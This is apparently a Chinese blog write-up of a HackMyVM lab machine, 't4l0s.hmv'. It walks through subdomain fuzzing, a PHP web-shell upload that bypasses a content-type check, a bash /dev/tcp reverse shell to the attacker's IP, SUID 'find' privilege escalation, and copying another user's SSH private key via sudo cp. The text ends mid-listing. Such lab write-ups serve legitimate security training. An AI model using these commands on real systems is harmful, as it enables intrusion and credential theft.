<span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">=</span>
Finished
<span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">=</span></code></pre>
<p>果然有发现<code>rainbow_mystery.txt </code><br><a target="_blank" rel="noopener" href="https://img.tg/image/OpimLU"><img src="https://ooo.0x0.ooo/2024/04/21/OpimLU.png" alt="OpimLU.png" loading="lazy"></a></p>
<blockquote>
<p>QWNjb3JkaW5nIHRvIHRoZSBPbGQgVGVzdGFtZW50LCB0aGUgcmFpbmJvdyB3YXMgY3JlYXRlZCBi<br>eSBHb2QgYWZ0ZXIgdGhlIHVuaXZlcnNhbCBGbG9vZC4gSW4gdGhlIGJpYmxpY2FsIGFjY291bnQs<br>IGl0IHdvdWxkIGFwcGVhciBhcyBhIHNpZ24gb2YgdGhlIGRpdmluZSB3aWxsIGFuZCB0byByZW1p<br>bmQgbWVuIG9mIHRoZSBwcm9taXNlIG1hZGUgYnkgR29kIGhpbXNlbGYgdG8gTm9haCB0aGF0IGhl<br>IHdvdWxkIG5ldmVyIGFnYWluIGRlc3Ryb3kgdGhlIGVhcnRoIHdpdGggYSBmbG9vZC4KTWF5YmUg<br>dGhhdCdzIHdoeSBJIGFtIGEgcm9ib3Q&#x2F;Ck1heWJlIHRoYXQgaXMgd2h5IEkgYW0gYWxvbmUgaW4g<br>dGhpcyB3b3JsZD8KClRoZSBhbnN3ZXIgaXMgaGVyZToKLS4uIC0tLSAtLSAuLSAuLiAtLiAvIC0g<br>Li4uLi0gLi0uLiAtLS0tLSAuLi4gLi0uLS4tIC4uLi4gLS0gLi4uLQo&#x3D;</p>
</blockquote>
<p>一眼base64，解码一下<br><a target="_blank" rel="noopener" href="https://img.tg/image/OpiPzv"><img src="https://ooo.0x0.ooo/2024/04/21/OpiPzv.png" alt="OpiPzv.png" loading="lazy"></a></p>
<blockquote>
<p>According to the Old Testament, the rainbow was created by God after the universal Flood. In the biblical account, it would appear as a sign of the divine will and to remind men of the promise made by<br>God himself to Noah that he would never again destroy the earth with a flood.<br>Maybe that’s why I am a robot?<br>Maybe that is why I am alone in this world?</p>
<p>The answer is here:<br>-.. — – .- .. -. &#x2F; - ….- .-.. —– … .-.-.- …. – …-</p>
</blockquote>
<p>最后一行一看就是摩斯密码，解码得到<code>DOMAINT4L0S.HMV</code>,像是一个域名<br>去掉前面的domain 域名应该是<code>t4l0s.hmv</code>，添加到hosts<br><a target="_blank" rel="noopener" href="https://img.tg/image/OpiDTr"><img src="https://ooo.0x0.ooo/2024/04/21/OpiDTr.png" alt="OpiDTr.png" loading="lazy"></a><br>看源码<br><a target="_blank" rel="noopener" href="https://img.tg/image/OpiHvM"><img src="https://ooo.0x0.ooo/2024/04/21/OpiHvM.png" alt="OpiHvM.png" loading="lazy"></a><br>让我们找到Elohim，那就扫一下子域</p>
<h3 id="子域扫描"><a href="#子域扫描" class="headerlink" title="子域扫描"></a>子域扫描</h3><pre class="language-bash" data-language="bash"><code class="language-bash">┌──<span class="token punctuation">(</span>root㉿kali2<span class="token punctuation">)</span>-<span class="token punctuation">[</span>~/Desktop<span class="token punctuation">]</span>
└─<span class="token comment"># ffuf -u http://t4l0s.hmv -H 'Host: FUZZ.t4l0s.hmv' -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -fs 615</span>

        /<span class="token string">'___\  /'</span>___<span class="token punctuation">\</span>           /'___<span class="token punctuation">\</span>       
       /<span class="token punctuation">\</span> <span class="token punctuation">\</span>__/ /<span class="token punctuation">\</span> <span class="token punctuation">\</span>__/  __  __  /<span class="token punctuation">\</span> <span class="token punctuation">\</span>__/       
       <span class="token punctuation">\</span> <span class="token punctuation">\</span> ,__<span class="token punctuation">\</span><span class="token punctuation">\</span> <span class="token punctuation">\</span> ,__<span class="token punctuation">\</span>/<span class="token punctuation">\</span> <span class="token punctuation">\</span>/<span class="token punctuation">\</span> <span class="token punctuation">\</span> <span class="token punctuation">\</span> <span class="token punctuation">\</span> ,__<span class="token punctuation">\</span>      
        <span class="token punctuation">\</span> <span class="token punctuation">\</span> <span class="token punctuation">\</span>_/ <span class="token punctuation">\</span> <span class="token punctuation">\</span> <span class="token punctuation">\</span>_/<span class="token punctuation">\</span> <span class="token punctuation">\</span> <span class="token punctuation">\</span>_<span class="token punctuation">\</span> <span class="token punctuation">\</span> <span class="token punctuation">\</span> <span class="token punctuation">\</span> <span class="token punctuation">\</span>_/      
         <span class="token punctuation">\</span> <span class="token punctuation">\</span>_<span class="token punctuation">\</span>   <span class="token punctuation">\</span> <span class="token punctuation">\</span>_<span class="token punctuation">\</span>  <span class="token punctuation">\</span> <span class="token punctuation">\</span>____/  <span class="token punctuation">\</span> <span class="token punctuation">\</span>_<span class="token punctuation">\</span>       
          <span class="token punctuation">\</span>/_/    <span class="token punctuation">\</span>/_/   <span class="token punctuation">\</span>/___/    <span class="token punctuation">\</span>/_/       

       v2.1.0-dev
________________________________________________

 :: Method           <span class="token builtin class-name">:</span> GET
 :: URL              <span class="token builtin class-name">:</span> http://t4l0s.hmv
 :: Wordlist         <span class="token builtin class-name">:</span> FUZZ: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt
 :: Header           <span class="token builtin class-name">:</span> Host: FUZZ.t4l0s.hmv
 :: Follow redirects <span class="token builtin class-name">:</span> <span class="token boolean">false</span>
 :: Calibration      <span class="token builtin class-name">:</span> <span class="token boolean">false</span>
 :: Timeout          <span class="token builtin class-name">:</span> <span class="token number">10</span>
 :: Threads          <span class="token builtin class-name">:</span> <span class="token number">40</span>
 :: Matcher          <span class="token builtin class-name">:</span> Response status: <span class="token number">200</span>-299,301,302,307,401,403,405,500
 :: Filter           <span class="token builtin class-name">:</span> Response size: <span class="token number">615</span>
________________________________________________

hellfire                <span class="token punctuation">[</span>Status: <span class="token number">200</span>, Size: <span class="token number">1659</span>, Words: <span class="token number">688</span>, Lines: <span class="token number">52</span>, Duration: 2ms<span class="token punctuation">]</span>
:: Progress: <span class="token punctuation">[</span><span class="token number">114441</span>/114441<span class="token punctuation">]</span> :: Job <span class="token punctuation">[</span><span class="token number">1</span>/1<span class="token punctuation">]</span> :: <span class="token number">7142</span> req/sec :: Duration: <span class="token punctuation">[</span><span class="token number">0</span>:00:12<span class="token punctuation">]</span> :: Errors: <span class="token number">0</span> ::</code></pre>
<p>扫出来一个子域hellfire.t4l0s.hmv,添加到hosts<br><a target="_blank" rel="noopener" href="https://img.tg/image/OpiQ7I"><img src="https://ooo.0x0.ooo/2024/04/21/OpiQ7I.png" alt="OpiQ7I.png" loading="lazy"></a><br><a target="_blank" rel="noopener" href="https://img.tg/image/OpiSLD"><img src="https://ooo.0x0.ooo/2024/04/21/OpiSLD.png" alt="OpiSLD.png" loading="lazy"></a><br>还挺有意思的，找对了，那就扫一下这个子域有什么目录</p>
<pre class="language-bash" data-language="bash"><code class="language-bash">                                                                                                                                                                                                                                                     
┌──<span class="token punctuation">(</span>root㉿kali2<span class="token punctuation">)</span>-<span class="token punctuation">[</span>~/Desktop<span class="token punctuation">]</span>
└─<span class="token comment"># gobuster dir -u http://hellfire.t4l0s.hmv/ -x html,txt,php,bak,zip --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt</span>
<span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">=</span>
Gobuster v3.6
by OJ Reeves <span class="token punctuation">(</span>@TheColonial<span class="token punctuation">)</span> <span class="token operator">&amp;</span> Christian Mehlmauer <span class="token punctuation">(</span>@firefart<span class="token punctuation">)</span>
<span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">=</span>
<span class="token punctuation">[</span>+<span class="token punctuation">]</span> Url:                     http://hellfire.t4l0s.hmv/
<span class="token punctuation">[</span>+<span class="token punctuation">]</span> Method:                  GET
<span class="token punctuation">[</span>+<span class="token punctuation">]</span> Threads:                 <span class="token number">10</span>
<span class="token punctuation">[</span>+<span class="token punctuation">]</span> Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
<span class="token punctuation">[</span>+<span class="token punctuation">]</span> Negative Status codes:   <span class="token number">404</span>
<span class="token punctuation">[</span>+<span class="token punctuation">]</span> User Agent:              gobuster/3.6
<span class="token punctuation">[</span>+<span class="token punctuation">]</span> Extensions:              html,txt,php,bak,zip
<span class="token punctuation">[</span>+<span class="token punctuation">]</span> Timeout:                 10s
<span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">=</span>
Starting gobuster <span class="token keyword">in</span> directory enumeration mode
<span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">=</span>
/index.php            <span class="token punctuation">(</span>Status: <span class="token number">200</span><span class="token punctuation">)</span> <span class="token punctuation">[</span>Size: <span class="token number">1659</span><span class="token punctuation">]</span>
/upload.php           <span class="token punctuation">(</span>Status: <span class="token number">200</span><span class="token punctuation">)</span> <span class="token punctuation">[</span>Size: <span class="token number">748</span><span class="token punctuation">]</span>
/output.php           <span class="token punctuation">(</span>Status: <span class="token number">200</span><span class="token punctuation">)</span> <span class="token punctuation">[</span>Size: <span class="token number">1350</span><span class="token punctuation">]</span>
/archivos             <span class="token punctuation">(</span>Status: <span class="token number">301</span><span class="token punctuation">)</span> <span class="token punctuation">[</span>Size: <span class="token number">169</span><span class="token punctuation">]</span> <span class="token punctuation">[</span>--<span class="token operator">></span> http://hellfire.t4l0s.hmv/archivos/<span class="token punctuation">]</span>
Progress: <span class="token number">559052</span> / <span class="token number">1323366</span> <span class="token punctuation">(</span><span class="token number">42.24</span>%<span class="token punctuation">)</span>^C
<span class="token punctuation">[</span><span class="token operator">!</span><span class="token punctuation">]</span> Keyboard interrupt detected, terminating.
Progress: <span class="token number">561517</span> / <span class="token number">1323366</span> <span class="token punctuation">(</span><span class="token number">42.43</span>%<span class="token punctuation">)</span>
<span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">=</span>
Finished
<span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">=</span></code></pre>
<p>有文件上传，那好办了</p>
<h2 id="getshell"><a href="#getshell" class="headerlink" title="getshell"></a>getshell</h2><p><a target="_blank" rel="noopener" href="https://img.tg/image/Opi0uF"><img src="https://ooo.0x0.ooo/2024/04/21/Opi0uF.png" alt="Opi0uF.png" loading="lazy"></a><br><a target="_blank" rel="noopener" href="https://img.tg/image/Opidz6"><img src="https://ooo.0x0.ooo/2024/04/21/Opidz6.png" alt="Opidz6.png" loading="lazy"></a><br>只能上传图片<br><a target="_blank" rel="noopener" href="https://img.tg/image/OpisPP"><img src="https://ooo.0x0.ooo/2024/04/21/OpisPP.png" alt="OpisPP.png" loading="lazy"></a><br>改成image&#x2F;png成功上传并给出了目录<code>archivos/shell.php</code><br>成功rce<br><a target="_blank" rel="noopener" href="https://img.tg/image/OpifTl"><img src="https://ooo.0x0.ooo/2024/04/21/OpifTl.png" alt="OpifTl.png" loading="lazy"></a><br>反弹个shell到kali</p>
<blockquote>
<p><a target="_blank" rel="noopener" href="http://hellfire.t4l0s.hmv/archivos/shell.php?1=bash%20-c%20%27bash%20-i%20%3E&%20/dev/tcp/192.168.56.104/4567%20%200%3E&1%27">http://hellfire.t4l0s.hmv/archivos/shell.php?1=bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.56.104%2F4567%20%200%3E%261%27</a></p>
</blockquote>
<pre class="language-bash" data-language="bash"><code class="language-bash">┌──<span class="token punctuation">(</span>root㉿kali2<span class="token punctuation">)</span>-<span class="token punctuation">[</span>~/Desktop<span class="token punctuation">]</span>
└─<span class="token comment"># nc -lvnp 4567</span>
listening on <span class="token punctuation">[</span>any<span class="token punctuation">]</span> <span class="token number">4567</span> <span class="token punctuation">..</span>.
connect to <span class="token punctuation">[</span><span class="token number">192.168</span>.56.104<span class="token punctuation">]</span> from <span class="token punctuation">(</span>UNKNOWN<span class="token punctuation">)</span> <span class="token punctuation">[</span><span class="token number">192.168</span>.56.158<span class="token punctuation">]</span> <span class="token number">40150</span>
bash: cannot <span class="token builtin class-name">set</span> terminal process group <span class="token punctuation">(</span><span class="token number">538</span><span class="token punctuation">)</span>: Inappropriate ioctl <span class="token keyword">for</span> device
bash: no job control <span class="token keyword">in</span> this shell
www-data@principle:~/hellfire.t4l0s.hmv/archivos$ </code></pre>
<h2 id="提权user"><a href="#提权user" class="headerlink" title="提权user"></a>提权user</h2><p><strong>sudo</strong></p>
<pre class="language-bash" data-language="bash"><code class="language-bash">www-data@principle:~$ <span class="token function">sudo</span> <span class="token parameter variable">-l</span> 
<span class="token punctuation">[</span>sudo<span class="token punctuation">]</span> password <span class="token keyword">for</span> www-data: </code></pre>
<p>无果<br><strong>suid</strong></p>
<pre class="language-bash" data-language="bash"><code class="language-bash">www-data@principle:~$ <span class="token function">find</span> / <span class="token parameter variable">-perm</span> <span class="token parameter variable">-4000</span> <span class="token operator"><span class="token file-descriptor important">2</span>></span>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/find
/usr/bin/su
/usr/bin/chsh
/usr/bin/umount
/usr/bin/newgrp</code></pre>
<p>有个find可以提权</p>
<pre class="language-bash" data-language="bash"><code class="language-bash">www-data@principle:~$ <span class="token function">find</span> <span class="token builtin class-name">.</span> <span class="token parameter variable">-exec</span> /bin/sh <span class="token parameter variable">-p</span> <span class="token punctuation">\</span><span class="token punctuation">;</span> <span class="token parameter variable">-quit</span>
$ <span class="token function">id</span>
<span class="token assign-left variable">uid</span><span class="token operator">=</span><span class="token number">33</span><span class="token punctuation">(</span>www-data<span class="token punctuation">)</span> <span class="token assign-left variable">gid</span><span class="token operator">=</span><span class="token number">33</span><span class="token punctuation">(</span>www-data<span class="token punctuation">)</span> <span class="token assign-left variable">euid</span><span class="token operator">=</span><span class="token number">1000</span><span class="token punctuation">(</span>talos<span class="token punctuation">)</span> <span class="token assign-left variable">groups</span><span class="token operator">=</span><span class="token number">33</span><span class="token punctuation">(</span>www-data<span class="token punctuation">)</span>
$ <span class="token function">whoami</span>
talos</code></pre>
<p>拿到talos的uid权限</p>
<pre class="language-bash" data-language="bash"><code class="language-bash">$ <span class="token function">ls</span> <span class="token parameter variable">-al</span>
total <span class="token number">40</span>
drwxr-xr-x <span class="token number">4</span> talos talos <span class="token number">4096</span> Jul <span class="token number">14</span>  <span class="token number">2023</span> <span class="token builtin class-name">.</span>
drwxr-xr-x <span class="token number">4</span> root  root  <span class="token number">4096</span> Jul  <span class="token number">4</span>  <span class="token number">2023</span> <span class="token punctuation">..</span>
-rw-r--r-- <span class="token number">1</span> talos talos    <span class="token number">1</span> Jul <span class="token number">14</span>  <span class="token number">2023</span> .bash_history
-rw-r----- <span class="token number">1</span> talos talos  <span class="token number">261</span> Jul  <span class="token number">5</span>  <span class="token number">2023</span> .bash_logout
-rw-r----- <span class="token number">1</span> talos talos <span class="token number">3545</span> Jul <span class="token number">14</span>  <span class="token number">2023</span> .bashrc
-rw------- <span class="token number">1</span> talos talos   <span class="token number">20</span> Jul  <span class="token number">4</span>  <span class="token number">2023</span> .lesshst
drw-r----- <span class="token number">3</span> talos talos <span class="token number">4096</span> Jun <span class="token number">30</span>  <span class="token number">2023</span> .local
-rw-r----- <span class="token number">1</span> talos talos  <span class="token number">807</span> Jun <span class="token number">30</span>  <span class="token number">2023</span> .profile
drwx------ <span class="token number">2</span> talos talos <span class="token number">4096</span> Jul <span class="token number">14</span>  <span class="token number">2023</span> .ssh
-rw-r----- <span class="token number">1</span> talos talos  <span class="token number">320</span> Jul <span class="token number">13</span>  <span class="token number">2023</span> note.txt
$ <span class="token function">cat</span> note.txt
Congratulations<span class="token operator">!</span> You have made it this far thanks to the manipulated <span class="token function">file</span> I left you, I knew you would <span class="token function">make</span> it<span class="token operator">!</span>
Now we are very close to finding this <span class="token boolean">false</span> God Elohim.
I left you a <span class="token function">file</span> with the name of one of the <span class="token number">12</span> Gods of Olympus, out of the eye of Elohim <span class="token punctuation">;</span><span class="token punctuation">)</span>
The tool I left you is still your ally. Good luck to you.</code></pre>
<p>talos目录下面有个note.txt</p>
<blockquote>
<p>祝贺多亏了我留给你的被操纵的文件，你才走到今天，我知道你会成功的！<br>现在我们很快就要找到这个虚假的上帝伊洛欣了。<br>我给你留下了一份档案，上面写着奥林匹斯十二神之一的名字，是埃洛希姆无意中留下的；）<br>我留给你的工具仍然是你的盟友。祝你好运。</p>
</blockquote>
<p>应该有有个文件是奥利匹斯十二神的名字<br>十二神<br><code>Afrodita, Apolo, Zeus, Hera, Poseidon, Ares, Atenea, Hermes, Artemisa, Hefesto, Demeter, Hestia</code><br>在Afrodita搜到了</p>
<pre class="language-bash" data-language="bash"><code class="language-bash">$ <span class="token function">find</span> / <span class="token parameter variable">-name</span> *Afrodita* <span class="token operator"><span class="token file-descriptor important">2</span>></span>/dev/null
/etc/selinux/Afrodita.key
$ <span class="token function">cat</span> /etc/selinux/A*
Here is my password:
Hax0rModeON

Now I have <span class="token keyword">done</span> another little trick to <span class="token builtin class-name">help</span> you reach Elohim.
REMEMBER: You need the access key and <span class="token function">open</span> the door. Anyway, he has a bad memory and that's why he keeps the lock coded and hidden at home.</code></pre>
<p>拿到了talos的密码<code>Hax0rModeON</code></p>
<pre class="language-bash" data-language="bash"><code class="language-bash">talos@principle:/home$ <span class="token function">sudo</span> <span class="token parameter variable">-l</span>
Matching Defaults entries <span class="token keyword">for</span> talos on principle:
    env_reset, mail_badpass,
    <span class="token assign-left variable">secure_path</span><span class="token operator">=</span>/usr/local/sbin<span class="token punctuation">\</span>:/usr/local/bin<span class="token punctuation">\</span>:/usr/sbin<span class="token punctuation">\</span>:/usr/bin<span class="token punctuation">\</span>:/sbin<span class="token punctuation">\</span>:/bin,
    use_pty

User talos may run the following commands on principle:
    <span class="token punctuation">(</span>elohim<span class="token punctuation">)</span> NOPASSWD: /bin/cp</code></pre>
<p>&#x2F;bin&#x2F;cp可以以elohim用户免密执行<br>那么就可以将gehenna的ssh私钥搞到手<br>由于ssh服务对外没有开放端口，在内看一下</p>
<pre class="language-bash" data-language="bash"><code class="language-bash">talos@principle:~$ ss <span class="token parameter variable">-tunel</span>
Netid   State    Recv-Q   Send-Q     Local Address:Port     Peer Address:Port   Process                                                                         
udp     UNCONN   <span class="token number">0</span>        <span class="token number">0</span>                <span class="token number">0.0</span>.0.0:68            <span class="token number">0.0</span>.0.0:*       ino:14617 sk:1 cgroup:/system.slice/ifup@enp0s3.service <span class="token operator">&lt;</span>-<span class="token operator">></span>                    
tcp     LISTEN   <span class="token number">0</span>        <span class="token number">128</span>              <span class="token number">0.0</span>.0.0:3445          <span class="token number">0.0</span>.0.0:*       ino:14744 sk:2 cgroup:/system.slice/ssh.service <span class="token operator">&lt;</span>-<span class="token operator">></span>                            
tcp     LISTEN   <span class="token number">0</span>        <span class="token number">511</span>              <span class="token number">0.0</span>.0.0:80            <span class="token number">0.0</span>.0.0:*       ino:14694 sk:3 cgroup:/system.slice/nginx.service <span class="token operator">&lt;</span>-<span class="token operator">></span>                          
tcp     LISTEN   <span class="token number">0</span>        <span class="token number">128</span>                 <span class="token punctuation">[</span>::<span class="token punctuation">]</span>:3445             <span class="token punctuation">[</span>::<span class="token punctuation">]</span>:*       ino:14757 sk:4 cgroup:/system.slice/ssh.service v6only:1 <span class="token operator">&lt;</span>-<span class="token operator">></span>                   
tcp     LISTEN   <span class="token number">0</span>        <span class="token number">511</span>                 <span class="token punctuation">[</span>::<span class="token punctuation">]</span>:80               <span class="token punctuation">[</span>::<span class="token punctuation">]</span>:*       ino:14695 sk:5 cgroup:/system.slice/nginx.service v6only:1 <span class="token operator">&lt;</span>-<span class="token operator">></span>  </code></pre>
<p>可以看到3445开放了ssh服务</p>
<pre class="language-bash" data-language="bash"><code class="language-bash">talos@principle:/tmp$ <span class="token function">sudo</span> <span class="token parameter variable">-u</span> elohim <span class="token function">cp</span> /home/gehenna/.ssh/id_rsa <span class="token builtin class-name">.</span>
talos@principle:/tmp$ <span class="token function">ls</span> <span class="token parameter variable">-al</span>
total <span class="token number">40</span>
drwxrwxrwt  <span class="token number">8</span> root   root   <span class="token number">4096</span> Apr <span class="token number">21</span> 09:39 <span class="token builtin class-name">.</span>
drwxr-xr-x <span class="token number">18</span> root   root   <span class="token number">4096</span> Jul <span class="token number">11</span>  <span class="token number">2023</span> <span class="token punctuation">..</span>
-rw-------  <span class="token number">1</span> elohim elohim <span class="token number">2655</span> Apr <span class="token number">21</span> 08:31 <span class="token number">123</span>
drwxrwxrwt  <span class="token number">2</span> root   root   <span class="token number">4096</span> Apr <span class="token number">21</span> 07:06 .font-unix
drwxrwxrwt  <span class="token number">2</span> root   root   <span class="token number">4096</span> Apr <span class="token number">21</span> 07:06 .ICE-unix
-rw-------  <span class="token number">1</span> elohim elohim <span class="token number">2655</span> Apr <span class="token number">21</span> 09:39 id_rsa
drwx------  <span class="token number">3</span> root   root   <span class="token number">4096</span> Apr <span class="token number">21</span> 07:06 systemd-private-d7726c388b224e10a7fabf986dc00943-systemd-logind.service-1mgdKN
drwx------  <span class="token number">3</span> root   root   <span class="token number">4096</span> Apr <span class="token number">21</span> 07:06 systemd-private-d7726c388b224e10a7fabf986dc00943-systemd-timesyncd.service-X7H5Ub
drwxrwxrwt  <span class="token number">2</span> root   root   <span class="token number">4096</span> Apr <span class="token number">21</span> 07:06 .X11-unix
drwxrwxrwt  <span class="token number">2</span> root   root   <span class="token number">4096</span> Apr <span class="token number">21</span> 07:06 .XIM-unix
talos@principle:/tmp$ <span class="token function">ssh</span> <span class="token parameter variable">-i</span> id_rsa <span class="token parameter variable">-p</span> <span class="token number">3445</span> elohim@localhost
bash: /usr/bin/ssh: Permission denied</code></pre>
<p>然后并不行，因为我们没有ssh工具，我从kali cp过来一个</p>
<pre class="language-bash" data-language="bash"><code class="language-bash">┌──<span class="token punctuation">(</span>root㉿kali2<span class="token punctuation">)</span>-<span class="token punctuation">[</span>~/Desktop<span class="token punctuation">]</span>
└─<span class="token comment"># whereis ssh            </span>
ssh: /usr/bin/ssh /etc/ssh /usr/share/man/man1/ssh.1.gz                         
┌──<span class="token punctuation">(</span>root㉿kali2<span class="token punctuation">)</span>-<span class="token punctuation">[</span>~/Desktop<span class="token punctuation">]</span>
└─<span class="token comment"># cp /usr/bin/ssh .     </span></code></pre>

<pre class="language-bash" data-language="bash"><code class="language-bash">talos@principle:~$ <span class="token function">wget</span> http://192.168.56.104:6677/ssh
--2024-04-21 <span class="token number">10</span>:14:12--  http://192.168.56.104:6677/ssh
Connecting to <span class="token number">192.168</span>.56.104:6677<span class="token punctuation">..</span>. connected.
HTTP request sent, awaiting response<span class="token punctuation">..</span>. <span class="token number">200</span> OK
Length: <span class="token number">986144</span> <span class="token punctuation">(</span>963K<span class="token punctuation">)</span> <span class="token punctuation">[</span>application/octet-stream<span class="token punctuation">]</span>
Saving to: ‘ssh’

<span class="token function">ssh</span>                 <span class="token number">100</span>%<span class="token punctuation">[</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">=</span><span class="token operator">></span><span class="token punctuation">]</span> <span class="token number">963</span>.03K  --.-KB/s    <span class="token keyword">in</span> <span class="token number">0</span>.007s  

<span class="token number">2024</span>-04-21 <span class="token number">10</span>:14:12 <span class="token punctuation">(</span><span class="token number">132</span> MB/s<span class="token punctuation">)</span> - ‘ssh’ saved <span class="token punctuation">[</span><span class="token number">986144</span>/986144<span class="token punctuation">]</span>

talos@principle:~$ <span class="token function">chmod</span> +x <span class="token function">ssh</span>
talos@principle:~$ ./ssh <span class="token parameter variable">-i</span> id_rsa <span class="token parameter variable">-p</span> <span class="token number">3445</span> elohim@localhost
Enter passphrase <span class="token keyword">for</span> key <span class="token string">'id_rsa'</span><span class="token builtin class-name">:</span> </code></pre>
<p>需要输入一个密码，找找信息</p>
<pre class="language-bash" data-language="bash"><code class="language-bash">talos@principle:/home/gehenna$ <span class="token function">ls</span> <span class="token parameter variable">-al</span>
total <span class="token number">40</span>
drwxr-xr-x <span class="token number">4</span> elohim elohim <span class="token number">4096</span> Jul <span class="token number">14</span>  <span class="token number">2023</span> <span class="token builtin class-name">.</span>
drwxr-xr-x <span class="token number">4</span> root   root   <span class="token number">4096</span> Jul  <span class="token number">4</span>  <span class="token number">2023</span> <span class="token punctuation">..</span>
-rw------- <span class="token number">1</span> elohim elohim  <span class="token number">289</span> Jul <span class="token number">14</span>  <span class="token number">2023</span> .bash_history
